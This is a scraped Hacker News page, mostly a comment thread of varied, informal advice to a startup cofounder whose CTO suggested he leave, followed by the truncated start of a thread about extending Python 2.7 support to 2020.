If you've lost inspiration, then probably a buyout makes sense. Again, don't sell yourself short -- you helped get the company this far, and did something right. Considering the risk you took, and probably low pay, it seems fair to get about 2X a fully-loaded engineer's cost for the time you were working full-time there. If your company is doing well maybe significantly more (again, not an expert, just a gut feel).

46
zaroth 3 days ago 1 reply      
TL;DR; There's nothing wrong with a vesting schedule.

It's an interesting point, how should founder sweat equity versus founder capital contribution vest? And then of course there's investor equity...

Can cash from a VC be treated differently from cash from an employee/founder? Of course it can, you have different shares, with different terms, and a different value per share.

In the end, whatever terms you negotiate for your shares should be used to value those shares. 3 year vesting, for example, sounds like a valuable feature for the company, so you would expect those shares to sell for [much] less than fully vested shares.

So the point is, you should definitely ask for accelerated vesting, and I think it's customary to do this at least for a portion of share to at least cover the cash and the months worked.

The realist part of me says, either you can fix the working relationship and contribute good value, and have a good enough time doing it, or you can't. If you can't, the best thing you can do for your company may possibly be to step aside. By all means fight to change their minds, and find the RIGHT solution for all of you.

In any case, you should be happy to continue to hold some portion of shares. If they want them to be non-voting, that's just another way to decrease their value, so you should ask for a commensurate increase in share count.

47
nickthemagicman 5 days ago 0 replies      
I hope as a cofounder you signed contracts and have equity.
48
overgard 4 days ago 0 replies      
I suppose I'm not clear on the power structure of your company, but to me that seems incredibly insubordinate and I would fire him immediately.

On the other hand, the fact that you're even asking this makes me think you might be too passive of a person to really be in a leadership role. (I don't mean that to be harsh, but you have to be honest with yourself about who you are).

49
sandGorgon 5 days ago 2 replies      
Sorry to barge in on this thread - but I have a question that turns this on its head.

Let's say you are a brilliant CTO/cofounder, but you are already doing something. Now you had this idea (or someone else had this idea) ... and you want to set them up for seed/series-A round and then you want to leave. assumption - you trust the CEO to not screw you.

How do you structure your equity compensation so that you have some benefit after 5 years? One of the thoughts I had was to show the short-term CTO as an investor with vested stock (in return for some negligible investment ... say 100$). Does this protect you from future investor rounds ?

50
weixiyen 5 days ago 0 replies      
Why would he ask you to leave unless you were a liability?

It makes no sense as there are so many other positions that become available as a company grows.

Go learn Product. It doesn't take nearly as long, and you can have just as big of a positive impact.

51
jsun 2 days ago 0 replies      
A lot of advice on lawyering up and fighting this tooth and nail, and gotta say, this is extremely childish and a terrible idea.

If you sue your company, you increase its chance to fail by an order of magnitude. If you lose, you can laugh as your former founders and friends struggle to recover to pre-lawsuit levels but probably fail. If you win you would've won worthless shares in a company that's shortly going to fail.

Be pragmatic. You even admitted yourself that you are not a great coder - be the bigger person and do what it takes to help the company succeed.

Oh and when you exit, negotiate for an automatic vest for 25-50% of your remaining unvested shares.

52
semerda 1 day ago 0 replies      
Call an early board meeting and aim for disciplinary action against the CTO. Founders don't get kicked out by employees. You also need to establish leadership power within the company as a founder vs being pushed around or treated like a code monkey.

Even CEOs can be removed from their high horse should there be collusion here between the CTO and CEO. If you feel this may be the case, seeking some legal advice so you can throw powerful words at those colluding should rattle the bird cake a bit. Just don't bring emotion in.

Founders are key to any company. Roles change. Part of a growing company. Founders keep the fire burning. Any smart investor will tell you the same.

53
vayarajesh 4 days ago 0 replies      
The CTO has surely overstepped the boundaries.. the project/company is your baby and no one and i mean NO ONE should tell you to leave your baby.. the CTO is just like a 'hired' babysitter for your baby (you want to ensure that your baby is growing in a good and right direction) and you might lack some parenting skills but that doesnt mean you have to give up your baby in the hands of the babysitter.

Even though you may not be a great coder you can and will grow to be one great coder.

CTO should know this clearly that this company is yours and he is just an hired help.. he may be the best CTO out there in the world.. but he cannot even suggest you to leave the company..

54
camus2 5 days ago 3 replies      
You founded the company,doesnt matter how bad you are at coding there is more to running a company than coding skills.

I'd fire the CTO,no matter how good he is,you're the boss,he is merely an adviser,he shouldnt be talking to you like that. What matters in business is loyalty, not skills.You'll learn it soon enough.

55
kshep 5 days ago 0 replies      
Without knowing any of the specifics--how long you've been in business, how much you've raised so far, the number of employees, the market opportunity, competitive landscape, runway, how much experience you and your other founder had, how much experience the CTO had, etc, etc, etc--I can't imagine trying to give you any advice other than to...

1) Ask yourself these questions:

* Did I get into this for a quick payday or to build a business?

* How could I best contribute to the business if I stayed? Is that something I want to do?

* Are these people I'd want to stay and work with indefinitely?

* If I had to walk away today and give up all my stock, what dollar value would I put on my contributions (both assets and effort) to date?

* If I had to walk away today, how much cash would I need to comfortably cover the downtime until I find what's next?

2) Talk to a personal attorney who has some experience working with start-ups, fundraising, etc. Someone who's negotiated founder contracts and separation agreements.

3) If you know them well enough, talk to the board, advisors, and/or investors who participated in your last round and ask their advice.

If they want you to leave after the next round, then that probably needs to be part of the conversations with potential investors. If you're a founder and have a large chunk of stock, it's not unlikely that they'd want to buy most or all of it back from you with proceeds from the next round.

56
doktrin 4 days ago 0 replies      
One of the privileges of being a founder is that employees don't get to tell you when to "leave".

It's your company. Consult an attorney and stand up for yourself.

57
hollerith 4 days ago 0 replies      
I always thought that it would be good to have an agreement with my cofounders that if ever a compromise cannot be reached, a "roll of the dice" will be used to decide the question in contention. (By "roll of the dice", I mean the probability that the course of action favored by investor A prevails is proportional to the amount of stock held by that investor.)

But I've never seen any references to a startup that actually uses such an arrangement. (What I have seen a lot is the notion or principle that the investor or coalition of investors with at least 50% of the outstanding stock decides, which does not seem to me to protect the interests of minority shareholders as well.)

Do any lawyers want to offer a guess as to whether a contract between cofounders (or between cofounders and investors) with such a "roll-the-dice" clause in it would be enforceable in the California courts?

P.S. Also, am I completely crazy or are most of the comment authors here wrong in implying that whether the OP will prevail in court has anything significant to do with how good a programmer he is?

58
late2part 5 days ago 0 replies      
What decision makes you happiest in the rest of your life?

If you measure that by money, go ahead.

Will you be happier staying and contributing? Or happier knowing you got it from first to second gear, and now they will grow what you started?

Practically, a question of ownership and rights comes into play - what does your contract/stock/employment agreement say?

Also pragmatically, since he's asking you to do something after ( after = IF ) you raise more funding, just say sure, let's talk about it then.

No reason to agree to a hypothetical, agree that you will be open minded and review it then.

59
youngButEager 4 days ago 0 replies      
If you feel that you've been used, you're right. Here's how you know:

1) did your co-founder grasp your skill level when you were both starting the firm? I 100% suspect you were forthright and yet your cofounder/ceo ran with you.

2) I'm sorry to break it to you, but you probably already suspect. For reference, read how Larry Ellison pushed out every one of his cofounders of Oracle in order to get the pie. Zuckerberg: did the same thing. Bill Gates and Ballmer pushed out Paul Allen in the early days of Microsoft. Yet Allen and some of Zuckerberg's 'pressured-out' victims still got paid. You need to get paid to. You got the firm to the point it's at -- your intellect, your creativity, your hard work.

3) You've already agreed to the supposition "the CEO (your co-founder) has quite a bit of confidence in the CTO." Why is the CEO unwilling to do the right thing about you and say 'he stays, he was here first, he laid the groundwork, we got where we are because of him and me together, he stays.' That is not a good sign that your cofounder is not backing you up.

4) My older brother was in your situation, part of the original ownership of the firm, they hired a pro outsider to take the reigns to scale it. That outsider's first objective was to bring in his people and he got my brother fired. The reliable cofounders then fired the outsider. Just as in your situation, my brother had invested in the firm. You may not have a reliable co-founder. OR. The CTO is playing 'divide and conquer.' Try to figure out which is the case. If the CEO/your cofounder hedges, you can't trust him.

5) Some companies keep on cofounders even if they're 100% green about business issues. At first, Sergey and Larry (google) did not want any advertising at all. Advertising made google. Larry and Sergey were too dumb about that part. They got talked into it by pro outsiders. Then Larry waited many years but he finally runs Google. He was a grad student with zero business acumen. But they remained loyal and gave him time to learn business strategy, develop business acumen, etc. Neither Larry nor Sergey got pressured out, and if the investors tried 'divide and conquer' to steal the entire business, they underestimated Sergey and Larry's commitment to each other.

You're probably being 'pushed out' and you may be in for quite a battle -- go see an attorney and tell him what's up and do not sign anything in your startup.

Your minimal objective is 100% vesting of all your equity. If your investors get paid, then you -- most likely owner of common shares, not preferred shares -- might also get paid. But if you allow yourself to be pushed out, you've kissed away a chance at some common shares enrichment -- in a company you started. That's a huge deal. Maybe once in a lifetime. Maybe.

60
sturmeh 5 days ago 0 replies      
Do you own half/part of the company?

If he wants you to leave you should still be entitled to half/part of the company, feel free to leave.

Do what YOU think is best for the company. <--

If for some reason you've been swindled out of owning half/part (or some portion, equivalent to the start-up split) of the company, I think you have a bigger issue outside the scope of this question.

61
jwatte 4 days ago 0 replies      
Just like a founder is often not the best runtime CEO, a founder is often not the best programmer."A few months" is short of the required experience for a senior software engineer by an order of magnitude. Engineers without experience cause debt that makes the code cost more to maintain over time. All of this is true.

Why did you start up in the first place? To change the world, or to have a place to hang out, or to learn things? Is there another place you can do that better now, at less cost?

Either find a niche where you are creating significant value in the current state of things, or get out to make room. Ask for a negotiated agreement with accelerated vesting of your options if you're not already owning.

62
blazespin 5 days ago 0 replies      
It's probably up to the board. If they agree with the CTO there is little you can do unless you can get majority shareholders to side with you.
63
dmourati 4 days ago 0 replies      
I'd move against him, and quickly. Tell the CEO you need unity not divisiveness. You are all for working with the new CTO but he is trying to force you out of the company you founded. There is only one way to deal with people like this: decisively. The fact that you've come here to ask for opinions on this matter suggests that you may lack the inner confidence to survive in a startup. Take this as a learning opportunity. Bone up on your technical skills, hire people smarter than you. Realize that you've been identified as a less than top-tier software developer and use that information to help you figure out where your skills can best help the company succeed. Good luck, move now and go for the jugular.
64
dscrd 4 days ago 0 replies      
Well, seems like most of the answers here are repeating pretty much the same mantra of this CTO being a douchebag and the champion founder being obviously correct. Please allow me to offer an alternative viewpoint.

I've seen some founders, especially of the technical variety, who manage to get a business running and then attribute all of that to their personal brilliance, and that they therefore deserve all the power in the company. This means that they will be extremely toxic personalities for everyone else, which in turn can easily stunt a company.

I don't know if this is the case here, since we only hear this from your perspective... but it may be that it's not your coding skill actually that is in question, but your interpersonal skills and attitude.

65
mikekij 4 days ago 0 replies      
Definitely sounds like poor communication between founders.

As an aside, I've been the founding CEO of a company that raised money and was acquired. I think my gifts make me really effective in running a company from idea stage to first revenue. I'm likely not the right person to run that company once there are 1000 employees. I'm fine with that

I don't think there's anything wrong with the exec team asking you to scale back your contributions if your skill set no longer matches the needs of the company. It just sounds like your partners chose a shitty way to go about it.

66
gscott 4 days ago 0 replies      
It is important to deal with this, I would suggest getting a number of people to support you then setting him down because this will only get worse. If you leave you will not get any benefit from the company and your investment will shrink as more investors come on. The only way to keep your investment is to stay in the company (or try to get bought out of the company). You should get him replaced. No matter how good he is, he is trying to ruin your life and that is enough to get rid of him asap.
67
mmccaff 5 days ago 0 replies      
You helped build something to a point that a job position was created for the CTO, and if you are passionate about what you're working on and eager to learn, it's unfortunate that he took the approach of telling you that you "are not good enough" rather than mentoring you and helping you grow as a developer. I'm sorry for your situation, it's rough.

That said, is this someone who you want to be working closely with? It could be something in your work relationship that is hard to get past. As others have said, understand what you are entitled to in terms of contracts and equity, and try having an open conversation with the CEO if you haven't already. Handle it professionally, and keep in mind that if you are desperately needed now (as you said) that you have some bargaining leverage. :)

68
richardw 4 days ago 0 replies      
Aside from the legal aspect, there are two others I think are important.

1) As a founder, you need to do what's best for the company. Whatever that is.

2) You're one of the owners. If you didn't have all the skills required for every aspect, at least you showed up and it got done. You can hire in whatever skills you need, including bringing in a CTO who knows more than you did. Maybe you aren't the right person to run the technical side, etc, but don't be muscled out just because someone is better than you are. Frankly you and the CEO need to stick together - if it's that easy to separate you what stops him from being thrown to the curb when there's a better business guy?

69
alien3d 4 days ago 0 replies      
A few question of business.Are you a shareholder of the company and have company equity ?Yes - just ignore him.No - just leave the company.

Is is a startup whom promised equity if the company profit /ipo and no pen paper to prove it Yes -leave the company.No - just ignore him.

Most CTO(Chief Technical Officer) and CEO (Chief Execute Officer) are hired by director /co-founder of the company.So nothing he/she will said will effect you(shareholder of the company) at all.If he /she proceed with firing process,said you're ain't director/co-founder.So please do it.

70
mikekij 4 days ago 0 replies      
This may be an unpopular sentiment, but I would do three things:

1) Hire an attorney to make sure your equity is safe2) Negotiate for an above-market-rate consulting engagement that will continue to pay your bills in return for ~!0 hours a week of consulting and...3) Start something else.

You have a unique skill set that allows you to start company that go on to raise money, generate revenue, and hire people. This is waaay more valuable than your ability to write code at a growth company.

Just my thoughts.

71
avifreedman 5 days ago 0 replies      
Are you good at seeing the products that need to be created? Writing 'running specification' code (hacking things up)? Do you understand the product space well? Who owns product? Is this something you do or could do? How good is your relationship with your cofounder? There is a lot more that involves tech understanding to be done in a startup than architecture, coding, and managing architecture and coding.
72
jfoster 5 days ago 0 replies      
It's your company. Even if one aspect of the company has outgrown your abilities, you could definitely find other ways to contribute. Your cofounder ought to be someone you trust. If so, this is something you should also discuss with your cofounder.
73
tluyben2 4 days ago 0 replies      
Wow. The lawyering up stuff. It is so depressing that the US works like that. Anyway, as someone who fired himself from his own company twice, I would say that he might have a point. You don't lose your shares (if you do, then arrange that you don't) and he is just making things better. If you are (like I was on occasions) the wrong person for the job, he is just making solid management decisions. The paranoid and lawyer crap could be true but often isn't. So you need to find that out. Sounds like you need to move closer to your co-founder in the business or indeed leave and just enjoy your equity.
74
ilovecookies 4 days ago 1 reply      
Interesting. I was just thinking, do the CTO and the CEO know each other from before? Was it the CEOs idea to hire this CTO maybe? If that's the case maybe this was planned between the CTO and CEO.

Since you're the founder with the focus on the tech aspect (basically you should be the CTO) what was the reason for hiring the CTO in the first place? A CTO that's obviously not a better software developer than you. Hard facts, but maybe it was your partner who planned this since the very beginning.

After you've talked to your lawyer you could possibly strike a deal with the CTO / CEO and go become an employee if you are interested in just keeping on coding for the company. Maybe getting a bonus that if you decide to leave or still be on the companies payroll provided that the company reach a certain revenue / value etc.

75
matttheatheist 3 days ago 0 replies      
Two ways to look a this problem:

Point of View 1:

Did you hire this CTO to make your company succeed? If so, then listen to his expertise and move the f* out of the way. Do not interfere with those who understand what they're doing. Ever.

Point of View 2:

What exactly does the other guy do? Business? What is that, exactly? Ordering pizza? And why can you not do the same thing? If you don't have a set role, then make one up.

Here's my $0.02 (Similar to POV 1):

In business, there is no room for emotions. You have to do what's right: Leave. If you lack the qualifications to contribute in a productive way, then find other people who can, and your company will have a higher likelihood of success. Just sit back, and relax. Make sure you walk away with a nice chunk of equity though, and you'll live a happy life.

76
gaius 4 days ago 0 replies      
It takes balls to say to your boss, you are damaging the company. Did you hire a CTO or a yes-man? It's time for you to transition to a new role in the company, not coding hands-on but designing new features.

If you wanted a guy to take care of the details but not the big picture, you would have hired a lead engineer NOT a CTO.

77
bradhe 5 days ago 0 replies      
> This has little sense to me. A startup think about next week and do no plan like that.

Clearly this CTO has his shit together. Seriously! Thats the job of a CTO for a company that has traction. What you claim is only true if the company doesn't yet have some kind of traction.

78
rlucas 2 days ago 0 replies      
webwright's comments are almost alone in having any real wisdom here, IMO. The nerd brigade of HN (a brigade which I know and love) is failing all over itself.

The truth is that equity in "startups" -- defined as that thing we do where we try to create massive equity value by compounding growth at astounding rates -- is something best held by people who are needed and wanted to work in the company on an ongoing basis.

Any other equity outside of the current exec team -- be it owned by departed founders or by old investors -- is strictly a deadweight loss. (for token amounts to advisors, service providers, partner firms, I would see that differently as its expected their greatest contributions lie ahead)

New money in will see a 50% absentee cofounder (or hell a 25 or even 15%) as rendering the company unfundable. And in any case very "hairy."

This semi-autistic ranting about how OP should lawyer up and tell the others to go to hell is insanely misguided. Most likely if a major shareholder is being eased out and wants to make a huge stink, the result is a dead company.

The sane and grow up thing to do is to talk to the cofounders and figure out who wants what, and if OP really is to leave, he should figure out how to maximize his value subject to a few considerations: 1. The odds he company can survive and thrive (e.g. Attract funding, motivate other execs), 2. The odds that if his deal is too rich he'll just med up inducing a need to engineer a cramdown in a future round, and 3. The reputational cost of being a petulant crazy pants vs being a soldier. Yes, this game is played more than once.

Oh yeah, DO lawyer up, but do so in order to achieve the above.

79
suren 4 days ago 0 replies      
Clearly, you are not being valued in this company. At best they are looking at you as cheap labour for next 3-6 months. At worst, you are a founder and a founder leaving is going to raise questions during funding. (Thats why he wants you to leave after 3-6 months after you have raised and not before).

Did you have a launched product/customers when the CTO joined? From your post, I gather that is a no. If so, then your CTO feels you don't deserve your stock. Him and your CEO are trying to cut you off.

Your CEO has not supported you either. He should have been the one talking to you. Not someone you hired unless the CTO has more stake than you which seems unlikely.

If he really thinks you are no longer the right fit for the company, he should have offered to vest you for your money and the time you have put in. And if your work is "not good enough" they should be asking you to leave immediately and not when it is convenient for them. You can't be both needed desperately and not good enough at the same time. To that end, I feel your CTO's ask immature, short sighted and greedy to say the least.

Talk to a lawyer, figure out a deal you could be okay with, try and get that and leave. Them yet to raise another round is a good bargaining chip for you.

80
ilovecookies 4 days ago 0 replies      
About you code. Alot of coders use different naming/formatting so that's an NON issue when it comes to your code. Also your the freakin co-founder... that CTO should have more important things to worry about than if the founder is writing camel-case / low-dash variables or functions. Testing is also optional, I know there are lots of coders that has written tons and tons of really useful code with little testing that works flawlessly. The main reason for using testing is maintainability, but since you are in the early stages of development you will usually end up rewriting your system later anyway, to a better / more secure version.
81
practicalpants 4 days ago 0 replies      
I'm imagining two scenarios. Either...

A) You are in fact inexperienced and are damaging the product with your code. If you have less than a year or two of programming (that includes one of those code "bootcamps" too...), then he's probably right. I would probably view you as dead weight, and would not want you on the team.

Or

B) You actually aren't that bad and could contribute to the product positively... especially if it's something like a RoR or Django app which is not the hardest thing to pickup w/o an extensive programming/CS background. In this case, your CTO is possibly an elitist prick. I've worked for a CTO who had pointlessly high standards, especially it being a pre-funded startup where, for example, he shouldn't be freaking out about a few lines of redundancy. He churned through a lot of programmers, was all very inefficient, and I certainly felt like he was power tripping at times. Even if this CTO guy is really good, if he has an abrasive personality and does stuff like I described above, for the sake of the team he should be the one to go. If your product is going places he shouldn't be too hard to replace.

82
wowsig 4 days ago 0 replies      
Cannot stress more on the part about writing/archiving everything. Relationships between the founders, during the very early days of a startup can swing between extreme brotherhood to extremely sceptical. Everyone is bearing the brunt of pressure and if things are not moving, it is human to delegate the responsibility of performance onto the other guy. I started a content-based startup in my college, and created much of the content myself. The trust that I bestowed upon my other co-founder was futile though. In the end, when things weren't looking up much, he ended up with not giving back the original content to me at all. Since the content was in the form of hand-drawn cartoon strips, I was just left with nothing. I saved up emails, but they didn't achieve much. In the future, the other co-founder tried to do things his way, but he didn't pursue the idea further, and all my hard work of creating just went down the drain. Make sure it doesn't happen to you.
83
thailehuy 4 days ago 0 replies      
Many people have already made the bad guy out of the CTO. But in my point of view, he's not.

You do admit that your skill is not up to par yet, so in a sense, you are a dead weight to the company (though you are improving, but it's better if you can just hire another good dev)

Now I'm not saying that you should quit the company (hell, it's your company). Remain as a co-founder, or a member of the board of director, or become product owner, agile master whatever you name it, just not a dev. If you really mean it, you can take a pause in your product development, learn more first, then re-join the team, let the team asset your skills to see if you are up to par.

Take a deep breath, and think about the future of the company. Whatever products you are developing, would it sustain this harsh world with your skills? This is the whole point of your decision.

TL;DR: if you are bad, leave the dirty job to others.

84
kyleblarson 4 days ago 0 replies      
Tough situation, sorry to hear about it. The comments in the thread are very informative. As I read each comment I'm thinking to myself "is this commenter an engineer / founder / vc / etc" and finding that to be an interesting exercise.
85
joncooper 3 days ago 0 replies      
Are there any of: a legal entity, employment agreements, IP agreements, participation agreements?
86
rajacombinator 4 days ago 0 replies      
This CTO sounds like scum. He may be 100% correct but it's not appropriate for him to suggest you leaving. Your CEO should man up and fire this guy for starting political infighting. Otherwise the CEO will be ousted next.
87
pepon 4 days ago 0 replies      
Fire. CTO. NOW.

You are a co-founder, not an employee. Remember that. It is you company, he works for you. If you would be hired in an company, would you dare to ask to the owner of the company to leave?? It doesn't matter how good or bad are you for the company, it is your company!

Fire him now.

88
gojomo 5 days ago 0 replies      
Make sure you've seen 'Startup.com' (documentary) and 'The Social Network' (useful for the archetypes even with the fictions). If you do wind up as an early founder out, try to be more like the guy in Startup.com, or Jawed Karim (YouTube), rather than Ron Wayne (Apple).
89
midas007 4 days ago 0 replies      
Founders need to find more ways to be useful.

If you have the hustle, get going on sales and biz dev.

Because all the coding talent in the world doesn't matter if customers aren't buying or don't know about your app.

90
allworknoplay 4 days ago 0 replies      
This is a tough situation. I have what I think are some relevant recent experiences, but I've signed some agreements and can't just post on the internet. e-mail me at jackphelps at gmail dot com if you want to talk.
91
robertschultz 4 days ago 0 replies      
Agreeing with everyone here. He has definitely overstepped the line and he is not acting like a true CTO. Part of his job is to ensure he instills a high level of trust and support with the team in addition to the rest of his role. Assuming you're an overall good guy, he should do what he can to ensure you stay as part of the company you helped build, be it bad code or not. And if things are not working out, at least provide the path of what you need to do to make it better as the clause. But either way, it sounds like he's just being an ass with an ego.
92
kbruner 4 days ago 1 reply      
I'm confused about your talk of vesting. Founders don't vest, they create the stock and sell/give it to others with a dollar amount or vesting schedule. Are you a founder or an early stage employee?
93
densone 5 days ago 0 replies      
First question I have. Do you at least have a double trigger in your stock agreement.

New CTO / Wants your out. Some stock option agreements have a double trigger where this can make you vest 100%. Make sure to look over it thoroughly.

94
Jean-Philipe 4 days ago 0 replies      
Being a CTO myself and having worked with smart people that were not as good coders, I think that in your case, the new CTO is just looking for a bad excuse to kick you out. Kicking out somebody who knows the system, product, infrastructure or code base from the beginning is generally a bad idea. Also, the line of professionalism between somebody like you (producing unstructured code without tests etc.) and genious like him is thinner than you think. He's either very arrogant or up to something. In any case, he definitely stepped over the line.
95
fluorid 4 days ago 0 replies      
Don't shoot the messenger.

Could it be the CEO/the bizguy who wants you to leave? Could he brought up the idea? I can hardly imagine that a hired CTO dares to say something like you wrote without backing.

96
rajeevk 5 days ago 0 replies      
IMO, there is no point you try to improve your coding skill at this point of time. As a co-founder, you should try to improve on management skills, try to find replacement of your CTO and then fire him
97
pyrrhotech 4 days ago 0 replies      
dude, you are the founder, he is an employee. You presumably have a lot more control over what happens at the company than he does. If you aren't a great coder, keep learning.
98
jmcdowell 5 days ago 0 replies      
Since he's not asking you to leave the company but instead to stop writing code, is there work to be done elsewhere in the company?

You might find this talk from Ian Hogarth (Songkick) at Hacker News London Meetup quite relevant. He talks about how he would fill a role at Songkick before getting a more specialised person in to fill that role which would see him moving to another completely separate role within the company which needed to be filled.

http://vimeo.com/59187050

99
smprk 4 days ago 0 replies      
You should definitely follow the advice of getting a legal counsel and dealing with the issue now as opposed to later.

Also, you should

1. Clear your thoughts around what you want for your company at this point in time, in the near future, and in the long run.

2. Understand what role you envision yourself and your fellow co-founder playing in the above scheme of things.

3. With thoughts around these two areas cleared up, you should sit and talk about this with your co-founder at the earliest.

100
Im_Talking 3 days ago 0 replies      
I haven't read all comments so excuse me if this has been mentioned, but you should hand in resignation now with minimum of notice period.

You say that you are currently desperately needed now, so your leverage to work-out an equitable legal arrangement with them will never be greater than now. As you said, in 6 months you may not have any leverage.

Just my $0.02.

101
Im_Talking 4 days ago 0 replies      
Sounds like this CTO will have more support than you. Time to move on.

Don't understand why everyone is talking lawyers. I'm sure that you have an equity stake which value will be helped by this new CTO. If you have no equity and (as you say) are a founder, then you are out-of-luck and no legal magic can solve this. Move on and leave on good terms. You never know.

102
napolux 4 days ago 0 replies      
Hire an attorney, and leave with all the shitload of money you can grab from these (not thankful) guys. What the other cofounder says about this situation?
103
Silhouette 5 days ago 0 replies      
EDIT: He's not asking me to leave now, since I'm still desperately needed, but in 3-6 months time after we have raised more funding.

Then you are in a relatively strong bargaining position now, but it will probably get dramatically weaker very soon if you do not act.

I agree with those who said you need to take proper legal advice about how secure whatever stake you have in the company really is if they try to take it from you. For example, it is surprising that you mentioned any problems with vesting; as a co-founder, do you not have a certain share of the equity outright? Remember that you are wearing at least two hats here, one as co-founder/investor/equity holder and the other as original chief geek, and hopefully these are completely separate.

In any case, if they need you to get to the big time, then you are in a good position to negotiate mutually acceptable terms for your future and should take immediate steps to do so. It sounds like the best outcome might be a (hopefully amicable) separation, if the professional relationship doesn't look like it has a future, but in that case you're well within your rights to expect fair compensation for anything you're giving up.

But before you do anything else, talk to a lawyer who specialises in this kind of subject, discuss the details of your exact situation, and take advice accordingly.

104
YuriNiyazov 4 days ago 0 replies      
Doesn't he work for you? You are a founder, after all.
105
BigBalli 4 days ago 0 replies      
He does have a point.It's not common because usually higher-ups always remind people who's in charge.It's up to you, but if you decide to stay you need to be more affirmative and build self-esteem.
106
michaelrhansen 5 days ago 0 replies      
As mentioned I would have a lawyer review your contracts thoroughly. When money starts coming in the door, the game changes completely. Situations can be brutal, don't be one of the sad stories.
107
jbverschoor 4 days ago 0 replies      
You hired the right guy, he's technically better than you Congrats!

So the second part is basically you getting a new job in the company. If there really is no place for you (which I would doubt) then you still keep some equity and go on.

108
Thiz 4 days ago 0 replies      
Stop coding.

Secure your equity.

Get a lawyer.

Fire the CTO.

In that order.

109
hoboerectus 4 days ago 0 replies      
Does the code you write reduce the costs or increase revenue of the business? Get those numbers together and compare them to the rest of development. If they compare favorably, share them with the CTO. If not, find a way to increase them.
110
crater500 5 days ago 0 replies      
First of all the CTO was hired to fix the shit they were hired for. Secondly, that amount of disrespect from a new employee who did not risk anything to start a start-up should be fired immediately. Kick that a-hole to the curb as they will be a cancer in the company.
111
randomflavor 5 days ago 0 replies      
Are you and your partner equal partners? Can you do more stuff on the biz side? product management/dev side? He's prob right, you shouldnt be coding enterprise level delivery with hackery crappy code. Be of service elsewhere or it will be a pain in the ass.
112
bowlofpetunias 4 days ago 0 replies      
And here HN shows it's true colors. It's all about competence and meritocracy until it affects a founder.

I've seen companies being run into the ground because founders remained in positions they weren't competent for. My guess is the CTO has seen the same, and he has no intention of taking the fall for that.

No, he hasn't overstepped his boundaries, if this kind of situation continuous he may as well hand in his own resignation. He's doing what he's been hired to do.

113
RollAHardSix 4 days ago 0 replies      
He works for you. Tell him to go fuck himself. He's way overstepped his boundaries.
114
sunny1304 5 days ago 0 replies      
is it possible that you stop writing code for few months, revisit your programming skill and meanwhile remain active on administration level ???If you think ur coding is not good, then there is always a chance to improve.And leaving the company is out of question. You have founded it. So you MUST be there because every story dont end like Steve Job's firing from Apple.
115
darksim905 4 days ago 0 replies      
He's throwing you out & fucking you over. If you're a founder you stay a founder unless you did something horribly bad.
116
tuke 4 days ago 0 replies      
It sounds like you're a good coder . . . because you care. Just saying'
117
beachstartup 5 days ago 1 reply      
there's plenty of other good tactical advice here, but i would like to say something more general:

this is the point in your life where you decide to be a lion, or a lamb. the hyenas are circling and they're not going away.

118
notastartup 4 days ago 1 reply      
He has NO point. He has no right to mouth you off like this. Take a cue from The Social Network.

    [leans down close to Mark, his voice low and dangerous]     And I'll bet what you hated the most was that they     identified me as a co-founder of Facebook, which I am.     You better lawyer up asshole, because I'm not coming     back for 30%, I'm coming back for EVERYTHING.        [backs away from Mark slowly, still looking at him]
Hint, that is what you should be getting ready to do. If he runs his mouth like this again, fire his ass, he's trying to snake his way in.

119
whatevsbro 4 days ago 0 replies      
Try and find out if the CTO is the only problem, ie. he's not conspiring with the other founder.

If the CTO is acting alone, get rid of him and continue with the business. If not, ruin their fundraising chances, cut your losses and move on to bootstrap a business on your own.

A prolonged fight won't do you any good.

120
innocentius 4 days ago 0 replies      
Have you read Kafka's The Trial?
121
jesusmichael 4 days ago 0 replies      
Wow... now that is a pickle.

Take a step back. Is his criticism sound? If in a perfect scenario, where you had a real development team, would you be the weak link? Is that true?

If the answer is yes... and you still feel passionately about the work the company is doing. Talk to your partner and find a position you can transition into. Don't hold back the company's progress because you want you're own private lesson in enterprise development.

If its not... Discuss firing this guy immediately... Nothing will destroy a company faster than disharmony among the core group. You and your partner have to be on the same page. There cannot be a little birdie sowing the seeds of insurrection. Hand this guy his hat and find someone else. Don't think about it just do it.

Only do this after you've thought thru his comments and objectively come to a conclusion about them. Consultants are paid to deliver the hard truth, and sometimes it may sting, but you'll get over it.

If it's time for you to leave... or that's the direction its headed. Get your equity memorialized fast while you're needed... don't let anyone sleep on that.

Good luck kid...

122
hackchir 4 days ago 0 replies      
Fire the CTO, asap!

Do not underestimate yourself, you can code and be very helpful to the company. You definitely do not need that type of CTO at this point.

Comments like "your code is not good enough" are completely subjective and if anything show malicious intent to cut you off.

I would talk to a lawyer in terms of what is the best way to do it though, such as you can maintain your equity and influence in the company.

DO NOT let that a-hole take advantage of your hard work and dedication you have put in your OWN company!

15
Extend Python 2.7 life till 2020 python.org
350 points by oal  4 days ago   278 comments top 36
1
drewcrawford 4 days ago 4 replies      
There are a lot of comments here from people who aren't on the python-dev list and don't really understand what this diff actually means.

The core developers are not required to maintain 2.7 post-2015, and most of them won't be involved in it. That part hasn't changed.

What is happening is that Red Hat is preparing to cut a RHEL 7 release, which AFAIK depending on how much you pay them they support for 13 years. So they will need to figure out how to support 2.7 themselves at least through 2027.

Here is where I am reading between the lines. RH are well within their right to fork Python and keep their maintenance patches to themselves and their customers (Python's not copyleft). But, they are nice guys and so maybe they are willing to upstream their changes at least for awhile if there is still a Python project willing to accept them. Again, this is my speculation based on the ML discussion, not what RH has actually said they will do.

An analogy can be made to Rails LTS, a commercial fork of Rails 2.x that patio11 was involved in [0]. Inevitably somebody is going to step in to support 2.7, and so let's see what we can do to avoid a situation where the only way to keep running 2.7 is to subscribe to RHEL.

Meanwhile, there are some large companies that use 2.7 extensively on Windows (e.g. Enthought, Anaconda) and the thinking goes that somebody can probably be found to produce a Windows installer once in awhile, assuming that Python.org will still host a download.

So really what is happening here is not very exciting. The core committers aren't doing anything different than leaving the project as originally planned. What is happening is that they will leave the lights on in the source control repository and on the FTP server, so as to capture the free labor from people at large companies who have an interest in continuing to support 2.7.

The alternative is that RH and other vendors create proprietary and expensive forks of Python 2.7. That may end up happening anyway, but it will take longer for your employer to notice you should stop contributing your patches back if binaries still appear on python.org and you don't have to ask IT to set up SCM and a bug tracker, etc.

[0] http://www.kalzumeus.com/2013/06/17/if-your-business-uses-ra...

2
chimeracoder 4 days ago 7 replies      
This is really disappointing to see - I fear that it will slow adoption of Python 3 even further, when it was just reaching a tipping point[0].

When I first learned Python, I learned Python 3 first because it was newer, and I figured everyone would be using it soon enough. Little did I know that Python 2 would continue to be supported for over ten years after that!

